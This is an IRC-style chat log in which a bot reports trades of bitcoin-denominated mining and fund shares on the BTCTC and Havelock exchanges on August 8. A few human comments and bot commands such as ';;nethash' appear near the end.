[BTCTC] [LABCOIN] 50 @ 0.001391 = 0.0696 BTC [-] Aug 08 14:05:32 [BTCTC] [ASICMINER-PT] 7 @ 3.531 = 24.717 BTC [-] Aug 08 14:05:33 [BTCTC] [LABCOIN] 1950 @ 0.001388 = 2.7066 BTC [-] Aug 08 14:05:34 [BTCTC] [ASICMINER-PT] 7 @ 3.531 = 24.717 BTC [-] Aug 08 14:05:45 [BTCTC] [NASTY-PT] 4 @ 0.004399 = 0.0176 BTC [+] Aug 08 14:07:39 [BTCTC] [NASTY-PT] 50 @ 0.004 = 0.2 BTC [-] Aug 08 14:07:40 [BTCTC] [NASTY-PT] 11 @ 0.004 = 0.044 BTC [-] Aug 08 14:10:34 [BTCTC] [BTCGARDEN] 1 @ 0.01603 BTC [+] Aug 08 14:10:55 [BTCTC] [LABCOIN] 2 @ 0.001406 = 0.0028 BTC [+] Aug 08 14:16:27 [BTCTC] [BTCGARDEN] 312 @ 0.01603 = 5.0014 BTC [+] Aug 08 14:19:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.03715 BTC [-] Aug 08 14:19:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.03712 = 0.3712 BTC [-] Aug 08 14:19:36 [BTCTC] [TAT.ASICMINER] 26 @ 0.03711 = 0.9649 BTC [-] Aug 08 14:19:37 [BTCTC] [TAT.ASICMINER] 8 @ 0.0368 = 0.2944 BTC [-] Aug 08 14:19:37 [BTCTC] [TAT.ASICMINER] 17 @ 0.0367 = 0.6239 BTC [-] Aug 08 14:19:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0366 BTC [-] Aug 08 14:19:40 [BTCTC] [TAT.ASICMINER] 25 @ 0.0366 = 0.915 BTC [-] Aug 08 14:19:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.03655 BTC [-] Aug 08 14:19:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.0365 BTC [-] Aug 08 14:19:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.036 BTC [-] Aug 08 14:19:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.036 BTC [-] Aug 08 14:19:45 [BTCTC] [TAT.ASICMINER] 5 @ 0.036 = 0.18 BTC [-] Aug 08 14:19:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.0356 = 0.0712 BTC [-] Aug 08 14:19:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.0355 BTC [-] Aug 08 14:21:43 [BTCTC] [ASICMINER-PT] 1 @ 3.69 BTC [+] Aug 08 14:22:46 [HAVELOCK] [AM100] 5 @ 0.0366 = 0.183 BTC [-] Aug 08 14:23:01 [HAVELOCK] [AM100] 25 @ 0.0365 = 0.9125 BTC [-] Aug 08 14:25:57 [HAVELOCK] [XBOND] 22 @ 0.00104664 = 0.023 BTC [-] Aug 08 14:39:01 [BTCTC] [BTCGARDEN] 4 @ 0.016 = 0.064 BTC [-] Aug 08 14:39:16 [BTCTC] [ASICMINER-PT] 1 @ 3.574 BTC [-] Aug 08 14:39:17 [BTCTC] [ASICMINER-PT] 4 @ 3.573 = 14.292 BTC [-] Aug 08 14:39:19 [BTCTC] [ASICMINER-PT] 3 @ 3.57 = 10.71 BTC [-] Aug 08 14:39:20 [BTCTC] [ASICMINER-PT] 1 @ 3.567 BTC [-] Aug 08 14:39:21 [BTCTC] [ASICMINER-PT] 1 @ 3.55 BTC [-] Aug 08 14:39:45 [BTCTC] [ASICMINER-PT] 1 @ 3.68 BTC [+] Aug 08 14:39:47 [BTCTC] [ASICMINER-PT] 2 @ 3.681 = 7.362 BTC [+] Aug 08 14:39:48 [BTCTC] [ASICMINER-PT] 1 @ 3.71 BTC [+] Aug 08 14:39:49 [BTCTC] [ASICMINER-PT] 1 @ 3.72 BTC [+] Aug 08 14:39:49 [BTCTC] [ASICMINER-PT] 3 @ 3.75 = 11.25 BTC [+] Aug 08 14:40:35 [BTCTC] [ACTIVEMINING] 1 @ 0.005999 BTC [-] Aug 08 14:40:37 [BTCTC] [ACTIVEMINING] 40 @ 0.00599 = 0.2396 BTC [-] Aug 08 14:40:38 [BTCTC] [ACTIVEMINING] 199 @ 0.00586 = 1.1661 BTC [-] Aug 08 14:40:39 [BTCTC] [ACTIVEMINING] 111 @ 0.005795 = 0.6432 BTC [-] Aug 08 14:40:40 [BTCTC] [ACTIVEMINING] 2 @ 0.0057 = 0.0114 BTC [-] Aug 08 14:40:42 [BTCTC] [ACTIVEMINING] 100 @ 0.005503 = 0.5503 BTC [-] Aug 08 14:41:30 [BTCTC] [TAT.ASICMINER] 15 @ 0.03551 = 0.5327 BTC [+] Aug 08 14:41:31 [BTCTC] [TAT.ASICMINER] 3 @ 0.0355 = 0.1065 BTC [-] Aug 08 14:41:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.0354 BTC [-] Aug 08 14:41:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.0351 BTC [-] Aug 08 14:41:34 [BTCTC] [TAT.ASICMINER] 28 @ 0.0351 = 0.9828 BTC [-] Aug 08 14:44:04 [BTCTC] [TAT.ASICMINER] 50 @ 0.03609 = 1.8045 BTC [+] Aug 08 14:48:19 [BTCTC] [ASICMINER-PT] 1 @ 3.698 BTC [-] Aug 08 14:48:21 [BTCTC] [ASICMINER-PT] 2 @ 3.698 = 7.396 BTC [-] Aug 08 14:48:23 [BTCTC] [DMS.PURCHASE] 1 @ 0.02828 BTC [+] Aug 08 14:49:53 [BTCTC] [LABCOIN] 10 @ 0.001408 = 0.0141 BTC [+] Aug 08 14:49:55 [BTCTC] [LABCOIN] 11 @ 0.001409 = 0.0155 BTC [+] Aug 08 14:50:09 [BTCTC] [TAT.ASICMINER] 40 @ 0.03556 = 1.4224 BTC [-] Aug 08 14:50:26 [BTCTC] [LTC-ATF.B2] 1 @ 0.01042 BTC [-] Aug 08 14:51:50 [BTCTC] [BTCGARDEN] 90 @ 0.016 = 1.44 BTC [-] Aug 08 14:52:48 [HAVELOCK] [HIM] 4 @ 0.14489999 = 0.5796 BTC [+] Aug 08 14:52:51 [BTCTC] [LABCOIN] 9 @ 0.001407 = 0.0127 BTC [-] Aug 08 14:53:48 [BTCTC] [TAT.VIRTUALMINE] 40 @ 0.00224 = 0.0896 BTC [-] Aug 08 14:58:10 [BTCTC] [BITVPS] 184 @ 0.001951 = 0.359 BTC [-] Aug 08 14:58:11 [BTCTC] [BITVPS] 100 @ 0.00195 = 0.195 BTC [-] Aug 08 14:59:09 [BTCTC] [BITVPS] 16 @ 0.00193 = 0.0309 BTC [-] Aug 08 15:00:01 [HAVELOCK] [XBOND] [PAID] 1.00931000 BTC to 2`018`620 shares, 50 satoshi per share Aug 08 15:00:23 [BTCTC] [TAT.ASICMINER] 8 @ 0.03643 = 0.2914 BTC [+] Aug 08 15:02:00 [HAVELOCK] [XBOND] 2 @ 0.00104664 = 0.0021 BTC [-] Aug 08 15:02:29 [HAVELOCK] [SMG] 5 @ 0.000237 = 0.0012 BTC [+] Aug 08 15:03:23 [BTCTC] [BASIC-MINING] 6 @ 0.3007 = 1.8042 BTC [-] Aug 08 15:03:24 [BTCTC] [BASIC-MINING] 3 @ 0.3007 = 0.9021 BTC [-] Aug 08 15:04:01 [BTCTC] [ASICMINER-PT] 1 @ 3.601 BTC [-] Aug 08 15:04:03 [BTCTC] [ASICMINER-PT] 1 @ 3.6 BTC [-] Aug 08 15:04:03 [BTCTC] [ASICMINER-PT] 4 @ 3.553 = 14.212 BTC [-] Aug 08 15:04:04 [BTCTC] [ASICMINER-PT] 3 @ 3.55 = 10.65 BTC [-] Aug 08 15:04:06 [BTCTC] [ASICMINER-PT] 2 @ 3.532 = 7.064 BTC [-] Aug 08 15:04:07 [BTCTC] [ASICMINER-PT] 3 @ 3.531 = 10.593 BTC [-] Aug 08 15:04:08 [BTCTC] [BASIC-MINING] 2 @ 0.3 = 0.6 BTC [-] Aug 08 15:04:09 [BTCTC] [ASICMINER-PT] 4 @ 3.531 = 14.124 BTC [-] Aug 08 15:04:40 [BTCTC] [LABCOIN] 10 @ 0.001408 = 0.0141 BTC [+] Aug 08 15:04:41 [BTCTC] [LABCOIN] 72 @ 0.001409 = 0.1014 BTC [+] Aug 08 15:05:03 [BTCTC] [ASICMINER-PT] 1 @ 3.532 BTC [+] Aug 08 15:05:05 [BTCTC] [ASICMINER-PT] 1 @ 3.53 BTC [-] Aug 08 15:05:06 [BTCTC] [ASICMINER-PT] 24 @ 3.53 = 84.72 BTC [-] Aug 08 15:11:32 [BTCTC] [TAT.ASICMINER] 40 @ 0.0363 = 1.452 BTC [-] Aug 08 15:13:55 [HAVELOCK] [XBOND] 1 @ 0.00104663 BTC [-] Aug 08 15:19:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.03621 BTC [-] Aug 08 15:21:07 [BTCTC] [BASIC-MINING] 2 @ 0.2999 = 0.5998 BTC [-] Aug 08 15:21:15 [BTCTC] [TAT.ASICMINER] 67 @ 0.03618 = 2.4241 BTC [-] Aug 08 15:24:30 [HAVELOCK] [AM100] 1 @ 0.0373 BTC [+] Aug 08 15:28:27 [BTCTC] [TAT.MINIGAME] 100 @ 0.000231 = 0.0231 BTC [-] Aug 08 15:29:22 [BTCTC] [TAT.MINIGAME] 100 @ 0.00023 = 0.023 BTC [-] Aug 08 15:35:31 [BTCTC] [BASIC-MINING] 1 @ 0.3 BTC [+] Aug 08 15:37:13 [BTCTC] [BITVPS] 13 @ 0.00213 = 0.0277 BTC [+] Aug 08 15:37:57 [HAVELOCK] [XBOND] 1 @ 0.00104663 BTC [-] Aug 08 15:41:03 [BTCTC] [BASIC-MINING] 1 @ 0.3 BTC [+] Aug 08 15:41:26 [BTCTC] [DMS.SELLING] 10 @ 0.0235 = 0.235 BTC [-] Aug 08 15:42:19 [BTCTC] [TAT.ASICMINER] 3 @ 0.03609 = 0.1083 BTC [-] Aug 08 15:44:55 [BTCTC] [DMS.SELLING] 3 @ 0.0235 = 0.0705 BTC [-] Aug 08 15:45:14 [BTCTC] [ACTIVEMINING] 1 @ 0.006029 BTC [+] Aug 08 15:46:28 [BTCTC] [LABCOIN] 1 @ 0.001408 BTC [-] Aug 08 15:46:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.03659 = 0.0732 BTC [+] Aug 08 15:56:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.0366 = 0.366 BTC [+] Aug 08 15:56:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.03659 BTC [-] Aug 08 15:56:49 [HAVELOCK] [XBOND] 18 @ 0.00104663 = 0.0188 BTC [-] Aug 08 15:57:03 [BTCTC] [BASIC-MINING] 1 @ 0.3 BTC [+] Aug 08 15:57:21 [BTCTC] [TAT.ASICMINER] 9 @ 0.03656 = 0.329 BTC [-] Aug 08 15:57:55 [HAVELOCK] [XBOND] 36 @ 0.00104664 = 0.0377 BTC [+] Aug 08 15:57:58 [HAVELOCK] [XBOND] 314 @ 0.00104665 = 0.3286 BTC [+] Aug 08 15:58:23 [BTCTC] [ASICMINER-PT] 1 @ 3.58 BTC [+] Aug 08 15:58:25 [HAVELOCK] [XBOND] 19 @ 0.00104665 = 0.0199 BTC [+] Aug 08 15:58:45 [BTCTC] [ACTIVEMINING] 16 @ 0.00597 = 0.0955 BTC [-] Aug 08 15:59:20 [BTCTC] [ACTIVEMINING] 3 @ 0.005578 = 0.0167 BTC [-] Aug 08 15:59:52 [HAVELOCK] [SMG] 10 @ 0.0002377 = 0.0024 BTC [+] Aug 08 16:00:00 [BTCTC] [TAT.ASICMINER] 2 @ 0.03656 = 0.0731 BTC [-] Aug 08 16:00:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.03656 = 0.1097 BTC [-] Aug 08 16:00:55 [BTCTC] [BTCGARDEN] 66 @ 0.016 = 1.056 BTC [-] Aug 08 16:00:57 [BTCTC] [BTCGARDEN] 234 @ 0.016 = 3.744 BTC [-] Aug 08 16:02:19 [HAVELOCK] [AM100] 1 @ 0.0371 BTC [-] Aug 08 16:02:56 [BTCTC] [ASICMINER-PT] 1 @ 3.543 BTC [-] Aug 08 16:07:17 [BTCTC] [TAT.ASICMINER] 6 @ 0.03656 = 0.2194 BTC [-] Aug 08 16:07:28 [HAVELOCK] [AM100] 9 @ 0.0371 = 0.3339 BTC [-] Aug 08 16:07:31 [HAVELOCK] [AM100] 223 @ 0.0371999 = 8.2956 BTC [+] Aug 08 16:07:33 [HAVELOCK] [AM100] 213 @ 0.0373 = 7.9449 BTC [+] Aug 08 16:07:59 [BTCTC] [BASIC-MINING] 2 @ 0.2999 = 0.5998 BTC [-] Aug 08 16:08:13 [BTCTC] [ACTIVEMINING] 12 @ 0.006 = 0.072 BTC [+] Aug 08 16:08:14 [BTCTC] [TAT.ASICMINER] 4 @ 0.0357 = 0.1428 BTC [-] Aug 08 16:08:54 [BTCTC] [DMS.SELLING] 15 @ 0.0231 = 0.3465 BTC [-] Aug 08 16:08:56 [BTCTC] [DMS.MINING] 15 @ 0.005626 = 0.0844 BTC [+] Aug 08 16:08:58 [BTCTC] [DMS.PURCHASE] 15 @ 0.02827 = 0.4241 BTC [-] Aug 08 16:09:10 [BTCTC] [DMS.MINING] 15 @ 0.005948 = 0.0892 BTC [+] Aug 08 16:09:13 [HAVELOCK] [XBOND] 27 @ 0.00104665 = 0.0283 BTC [+] Aug 08 16:09:24 [BTCTC] [ACTIVEMINING] 188 @ 0.006 = 1.128 BTC [+] Aug 08 16:09:37 [BTCTC] [DMS.MINING] 5 @ 0.005626 = 0.0281 BTC [-] Aug 08 16:09:39 [BTCTC] [DMS.PURCHASE] 5 @ 0.02827 = 0.1414 BTC [-] Aug 08 16:10:15 [BTCTC] [DMS.PURCHASE] 13 @ 0.02827 = 0.3675 BTC [-] Aug 08 16:10:25 [BTCTC] [DMS.PURCHASE] 15 @ 0.02827 = 0.4241 BTC [-] Aug 08 16:11:06 [BTCTC] [LTC-ATF.B2] 10 @ 0.01043 = 0.1043 BTC [+] Aug 08 16:11:46 [BTCTC] [DMS.SELLING] 15 @ 0.023 = 0.345 BTC [-] Aug 08 16:11:48 [BTCTC] [DMS.MINING] 15 @ 0.005625 = 0.0844 BTC [-] Aug 08 16:11:50 [BTCTC] [DMS.PURCHASE] 15 @ 0.02827 = 0.4241 BTC [-] Aug 08 16:12:21 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [-] Aug 08 16:12:34 [BTCTC] [DMS.SELLING] 7 @ 0.023 = 0.161 BTC [-] Aug 08 16:12:40 [BTCTC] [DMS.PURCHASE] 7 @ 0.02827 = 0.1979 BTC [-] Aug 08 16:13:20 [BTCTC] [DMS.SELLING] 7 @ 0.023 = 0.161 BTC [-] Aug 08 16:13:27 [BTCTC] [DMS.MINING] 7 @ 0.005621 = 0.0393 BTC [-] Aug 08 16:15:25 [BTCTC] [DMS.SELLING] 10 @ 0.023 = 0.23 BTC [-] Aug 08 16:15:27 [BTCTC] [DMS.MINING] 10 @ 0.005604 = 0.056 BTC [-] Aug 08 16:15:29 [BTCTC] [DMS.PURCHASE] 10 @ 0.02827 = 0.2827 BTC [-] Aug 08 16:16:15 [BTCTC] [DMS.SELLING] 1 @ 0.023 BTC [-] Aug 08 16:16:24 [BTCTC] [DMS.PURCHASE] 1 @ 0.02827 BTC [-] Aug 08 16:17:16 [HAVELOCK] [XBOND] 1 @ 0.00104665 BTC [+] Aug 08 16:18:09 [BTCTC] [DMS.MINING] 3 @ 0.005603 = 0.0168 BTC [-] Aug 08 16:22:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.03638 BTC [+] Aug 08 16:24:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.03637 BTC [-] Aug 08 16:25:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.03635 BTC [-] Aug 08 16:27:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.0364 BTC [+] Aug 08 16:27:18 [BTCTC] [ASICMINER-PT] 2 @ 3.607 = 7.214 BTC [+] Aug 08 16:27:57 [HAVELOCK] [XBOND] 1514 @ 0.00104665 = 1.5846 BTC [+] Aug 08 16:28:00 [HAVELOCK] [XBOND] 2486 @ 0.00104668 = 2.602 BTC [+] Aug 08 16:29:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.03659 BTC [+] Aug 08 16:30:34 [HAVELOCK] [AM100] 1 @ 0.0360002 BTC [-] Aug 08 16:30:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.0366 BTC [+] Aug 08 16:31:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.0366 BTC [+] Aug 08 16:32:11 [HAVELOCK] [XBOND] 38 @ 0.00104668 = 0.0398 BTC [+] Aug 08 16:33:18 [HAVELOCK] [XBOND] 346 @ 0.00104668 = 0.3622 BTC [+] Aug 08 16:35:39 [HAVELOCK] [HIM] 1 @ 0.14489999 BTC [+] Aug 08 16:38:30 [BTCTC] [ACTIVEMINING] 15 @ 0.005999 = 0.09 BTC [-] Aug 08 16:40:00 [BTCTC] [ASICMINER-PT] 2 @ 3.609 = 7.218 BTC [+] Aug 08 16:40:01 [BTCTC] [ASICMINER-PT] 3 @ 3.61 = 10.83 BTC [+] Aug 08 16:41:12 [BTCTC] [BTCGARDEN] 3 @ 0.01599 = 0.048 BTC [-] Aug 08 16:41:21 [BTCTC] [TAT.ASICMINER] 19 @ 0.03592 = 0.6825 BTC [-] Aug 08 16:42:07 [HAVELOCK] [AM100] 3 @ 0.0365 = 0.1095 BTC [+] Aug 08 16:45:40 [BTCTC] [ASICMINER-PT] 1 @ 3.608 BTC [-] Aug 08 16:48:53 [BTCTC] [BMF] 8 @ 0.03404 = 0.2723 BTC [-] Aug 08 16:48:53 [BTCTC] [BMF] 1 @ 0.03404 BTC [-] Aug 08 16:48:55 [BTCTC] [BMF] 12 @ 0.03402 = 0.4082 BTC [-] Aug 08 16:49:23 [BTCTC] [BTCGARDEN] 12 @ 0.01599 = 0.1919 BTC [-] Aug 08 16:50:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.03591 = 0.1077 BTC [-] Aug 08 16:51:01 [BTCTC] [BTCGARDEN] 181 @ 0.01599 = 2.8942 BTC [-] Aug 08 16:51:24 [BTCTC] [TAT.ASICMINER] 32 @ 0.03592 = 1.1494 BTC [+] Aug 08 16:52:31 [BTCTC] [TAT.ASICMINER] 32 @ 0.03594 = 1.1501 BTC [+] Aug 08 16:53:39 [BTCTC] [TAT.ASICMINER] 28 @ 0.03648 = 1.0214 BTC [+] Aug 08 16:54:16 [BTCTC] [BITVPS] 3 @ 0.00209 = 0.0063 BTC [-] Aug 08 16:54:35 [BTCTC] [DMS.SELLING] 20 @ 0.023 = 0.46 BTC [-] Aug 08 16:54:37 [BTCTC] [DMS.MINING] 20 @ 0.005606 = 0.1121 BTC [+] Aug 08 16:54:38 [BTCTC] [DMS.PURCHASE] 20 @ 0.02827 = 0.5654 BTC [-] Aug 08 16:55:13 [HAVELOCK] [AM100] 200 @ 0.0361001 = 7.22 BTC [-] Aug 08 16:55:38 [HAVELOCK] [AM100] 8 @ 0.03611 = 0.2889 BTC [+] Aug 08 16:55:41 [HAVELOCK] [AM100] 10 @ 0.036101 = 0.361 BTC [-] Aug 08 16:55:43 [HAVELOCK] [AM100] 15 @ 0.0361001 = 0.5415 BTC [-] Aug 08 16:55:45 [HAVELOCK] [AM100] 56 @ 0.03601011 = 2.0166 BTC [-] Aug 08 16:55:47 [HAVELOCK] [AM100] 38 @ 0.036001 = 1.368 BTC [-] Aug 08 16:55:50 [HAVELOCK] [AM100] 10 @ 0.03600001 = 0.36 BTC [-] Aug 08 16:55:52 [HAVELOCK] [AM100] 10 @ 0.036 = 0.36 BTC [-] Aug 08 16:55:54 [HAVELOCK] [AM100] 8 @ 0.036 = 0.288 BTC [-] Aug 08 16:55:56 [HAVELOCK] [AM100] 4 @ 0.036 = 0.144 BTC [-] Aug 08 16:55:58 [HAVELOCK] [AM100] 141 @ 0.036 = 5.076 BTC [-] Aug 08 16:57:31 [BTCTC] [BTC-TRADING-PT] 20 @ 0.6882 = 13.764 BTC [-] Aug 08 17:02:16 [BTCTC] [BASIC-MINING] 1 @ 0.29 BTC [-] Aug 08 17:02:18 [BTCTC] [BASIC-MINING] 1 @ 0.289 BTC [-] Aug 08 17:02:19 [BTCTC] [BASIC-MINING] 1 @ 0.2888 BTC [-] Aug 08 17:02:20 [BTCTC] [BASIC-MINING] 3 @ 0.2832 = 0.8496 BTC [-] Aug 08 17:02:21 [BTCTC] [BASIC-MINING] 1 @ 0.2831 BTC [-] Aug 08 17:02:23 [BTCTC] [BASIC-MINING] 5 @ 0.283 = 1.415 BTC [-] Aug 08 17:02:24 [BTCTC] [BASIC-MINING] 5 @ 0.283 = 1.415 BTC [-] Aug 08 17:02:25 [BTCTC] [BASIC-MINING] 7 @ 0.283 = 1.981 BTC [-] Aug 08 17:02:26 [BTCTC] [BASIC-MINING] 2 @ 0.2812 = 0.5624 BTC [-] Aug 08 17:02:26 [BTCTC] [BASIC-MINING] 4 @ 0.2811 = 1.1244 BTC [-] Aug 08 17:02:45 Man o man Aug 08 17:02:55 Let it fall some and then invest into Basic lol Aug 08 17:03:10 [BTCTC] [BTCGARDEN] 870 @ 0.01599 = 13.9113 BTC [-] Aug 08 17:04:32 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.002239 = 0.009 BTC [-] Aug 08 17:09:41 [BTCTC] [ASICMINER-PT] 1 @ 3.59 BTC [-] Aug 08 17:11:50 [BTCTC] [BASIC-MINING] 20 @ 0.282 = 5.64 BTC [+] Aug 08 17:11:52 [BTCTC] [BASIC-MINING] 6 @ 0.281 = 1.686 BTC [-] Aug 08 17:12:22 [BTCTC] [TAT.ASICMINER] 5 @ 0.03592 = 0.1796 BTC [-] Aug 08 17:14:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.03592 BTC [-] Aug 08 17:14:43 [BTCTC] [COGNITIVE] 27 @ 0.3503 = 9.4581 BTC [+] Aug 08 17:14:57 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.002239 = 0.0134 BTC [-] Aug 08 17:15:15 [BTCTC] [LABCOIN] 1 @ 0.0014 BTC [-] Aug 08 17:15:17 [BTCTC] [TAT.ASICMINER] 67 @ 0.03646 = 2.4428 BTC [+] Aug 08 17:15:19 [BTCTC] [TAT.ASICMINER] 6 @ 0.03646 = 0.2188 BTC [+] Aug 08 17:15:54 [BTCTC] [LABCOIN] 299 @ 0.0014 = 0.4186 BTC [-] Aug 08 17:15:55 [BTCTC] [LABCOIN] 25 @ 0.0014 = 0.035 BTC [-] Aug 08 17:17:20 [HAVELOCK] [XBOND] 50 @ 0.00104668 = 0.0523 BTC [+] Aug 08 17:17:30 [HAVELOCK] [XBOND] 6 @ 0.00104668 = 0.0063 BTC [+] Aug 08 17:17:54 [HAVELOCK] [XBOND] 1 @ 0.00104668 BTC [+] Aug 08 17:18:08 [HAVELOCK] [XBOND] 1 @ 0.00104668 BTC [+] Aug 08 17:18:12 [BTCTC] [ASICMINER-PT] 1 @ 3.61 BTC [+] Aug 08 17:18:28 [HAVELOCK] [XBOND] 3 @ 0.00104668 = 0.0031 BTC [+] Aug 08 17:19:10 [BTCTC] [TAT.ASICMINER] 8 @ 0.03592 = 0.2874 BTC [-] Aug 08 17:19:31 [BTCTC] [TAT.ASICMINER] 67 @ 0.03591 = 2.406 BTC [-] Aug 08 17:19:59 [BTCTC] [ASICMINER-PT] 4 @ 3.62 = 14.48 BTC [+] Aug 08 17:22:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.0359 = 0.0718 BTC [-] Aug 08 17:24:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.0359 BTC [-] Aug 08 17:24:57 [HAVELOCK] [LABCO] 10 @ 0.00135 = 0.0135 BTC [+] Aug 08 17:25:05 [HAVELOCK] [KCIM] 1 @ 0.95 BTC [-] Aug 08 17:25:27 [HAVELOCK] [AM100] 10 @ 0.0365 = 0.365 BTC [+] Aug 08 17:25:36 [BTCTC] [LABCOIN] 1 @ 0.001393 BTC [-] Aug 08 17:25:37 [BTCTC] [LABCOIN] 50 @ 0.001393 = 0.0697 BTC [-] Aug 08 17:25:39 [BTCTC] [LABCOIN] 1000 @ 0.001392 = 1.392 BTC [-] Aug 08 17:25:40 [BTCTC] [LABCOIN] 999 @ 0.001388 = 1.3866 BTC [-] Aug 08 17:26:08 [BTCTC] [ASICMINER-PT] 1 @ 3.62 BTC [+] Aug 08 17:26:10 [BTCTC] [ASICMINER-PT] 1 @ 3.601 BTC [-] Aug 08 17:26:11 [BTCTC] [ASICMINER-PT] 25 @ 3.6 = 90 BTC [-] Aug 08 17:26:36 [HAVELOCK] [LABCO] 15 @ 0.0013421 = 0.0201 BTC [-] Aug 08 17:26:59 [HAVELOCK] [AM100] 1 @ 0.0365 BTC [+] Aug 08 17:27:04 [BTCTC] [BTCGARDEN] 2 @ 0.01584 = 0.0317 BTC [-] Aug 08 17:27:06 [BTCTC] [BTCGARDEN] 90 @ 0.01583 = 1.4247 BTC [-] Aug 08 17:27:08 [HAVELOCK] [HIM] 5 @ 0.14489999 = 0.7245 BTC [+] Aug 08 17:28:01 [HAVELOCK] [AM100] 1 @ 0.0365 BTC [+] Aug 08 17:28:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.0359 BTC [-] Aug 08 17:28:33 [BTCTC] [TAT.ASICMINER] 28 @ 0.03591 = 1.0055 BTC [+] Aug 08 17:29:02 [BTCTC] [ASICMINER-PT] 20 @ 3.6 = 72 BTC [-] Aug 08 17:30:10 [BTCTC] [ASICMINER-PT] 1 @ 3.6 BTC [-] Aug 08 17:31:28 [BTCTC] [ASICMINER-PT] 1 @ 3.6 BTC [-] Aug 08 17:31:41 [BTCTC] [COGNITIVE] 3 @ 0.35 = 1.05 BTC [-] Aug 08 17:31:54 [HAVELOCK] [XBOND] 4 @ 0.00104668 = 0.0042 BTC [+] Aug 08 17:38:07 [BTCTC] [ASICMINER-PT] 1 @ 3.6 BTC [-] Aug 08 17:38:58 [BTCTC] [ASICMINER-PT] 1 @ 3.6 BTC [-] Aug 08 17:39:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.03644 = 0.0729 BTC [+] Aug 08 17:41:28 [HAVELOCK] [AM100] 85 @ 0.0365 = 3.1025 BTC [+] Aug 08 17:41:57 [BTCTC] [LABCOIN] 25 @ 0.001388 = 0.0347 BTC [-] Aug 08 17:41:58 [BTCTC] [LABCOIN] 24 @ 0.001352 = 0.0324 BTC [-] Aug 08 17:42:00 [BTCTC] [LABCOIN] 75 @ 0.001351 = 0.1013 BTC [-] Aug 08 17:42:01 [BTCTC] [LABCOIN] 120 @ 0.00135 = 0.162 BTC [-] Aug 08 17:42:02 [BTCTC] [LABCOIN] 125 @ 0.001346 = 0.1683 BTC [-] Aug 08 17:42:03 [BTCTC] [LABCOIN] 1000 @ 0.001345 = 1.345 BTC [-] Aug 08 17:42:04 [BTCTC] [LABCOIN] 135 @ 0.001344 = 0.1814 BTC [-] Aug 08 17:42:50 [BTCTC] [ASICMINER-PT] 4 @ 3.6 = 14.4 BTC [-] Aug 08 17:42:51 [BTCTC] [ASICMINER-PT] 4 @ 3.64 = 14.56 BTC [+] Aug 08 17:42:52 [BTCTC] [ASICMINER-PT] 2 @ 3.641 = 7.282 BTC [+] Aug 08 17:43:04 [BTCTC] [TAT.MINIGAME] 1 @ 0.000231 BTC [+] Aug 08 17:43:12 [BTCTC] [BASIC-MINING] 4 @ 0.281 = 1.124 BTC [-] Aug 08 17:43:14 [BTCTC] [BASIC-MINING] 1 @ 0.2803 BTC [-] Aug 08 17:43:15 [BTCTC] [BASIC-MINING] 1 @ 0.2801 BTC [-] Aug 08 17:43:16 [BTCTC] [BASIC-MINING] 2 @ 0.28 = 0.56 BTC [-] Aug 08 17:43:18 [BTCTC] [BASIC-MINING] 2 @ 0.276 = 0.552 BTC [-] Aug 08 17:43:18 [BTCTC] [BASIC-MINING] 13 @ 0.276 = 3.588 BTC [-] Aug 08 17:43:19 [BTCTC] [BASIC-MINING] 30 @ 0.2751 = 8.253 BTC [-] Aug 08 17:43:20 [BTCTC] [BASIC-MINING] 25 @ 0.275 = 6.875 BTC [-] Aug 08 17:43:21 [BTCTC] [BASIC-MINING] 1 @ 0.2511 BTC [-] Aug 08 17:43:22 [BTCTC] [BASIC-MINING] 1 @ 0.2511 BTC [-] Aug 08 17:43:23 [BTCTC] [BASIC-MINING] 1 @ 0.25 BTC [-] Aug 08 17:43:25 [BTCTC] [BASIC-MINING] 1 @ 0.25 BTC [-] Aug 08 17:43:26 [BTCTC] [BASIC-MINING] 5 @ 0.25 = 1.25 BTC [-] Aug 08 17:43:27 [BTCTC] [BASIC-MINING] 5 @ 0.24 = 1.2 BTC [-] Aug 08 17:43:28 [BTCTC] [BASIC-MINING] 1 @ 0.2386 BTC [-] Aug 08 17:43:29 [BTCTC] [BASIC-MINING] 3 @ 0.237 = 0.711 BTC [-] Aug 08 17:43:29 [BTCTC] [BASIC-MINING] 36 @ 0.2305 = 8.298 BTC [-] Aug 08 17:43:30 [BTCTC] [BASIC-MINING] 28 @ 0.2302 = 6.4456 BTC [-] Aug 08 17:45:22 [BTCTC] [BTCGARDEN] 1025 @ 0.01599 = 16.3898 BTC [+] Aug 08 17:45:23 [BTCTC] [BTCGARDEN] 216 @ 0.016 = 3.456 BTC [+] Aug 08 17:45:24 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 08 17:45:26 [BTCTC] [BTCGARDEN] 20 @ 0.016 = 0.32 BTC [+] Aug 08 17:45:42 [BTCTC] [BASIC-MINING] 1 @ 0.2969 BTC [+] Aug 08 17:45:57 ;;nethash Aug 08 17:45:58 364100.778984 Aug 08 17:46:03 ;;estimate 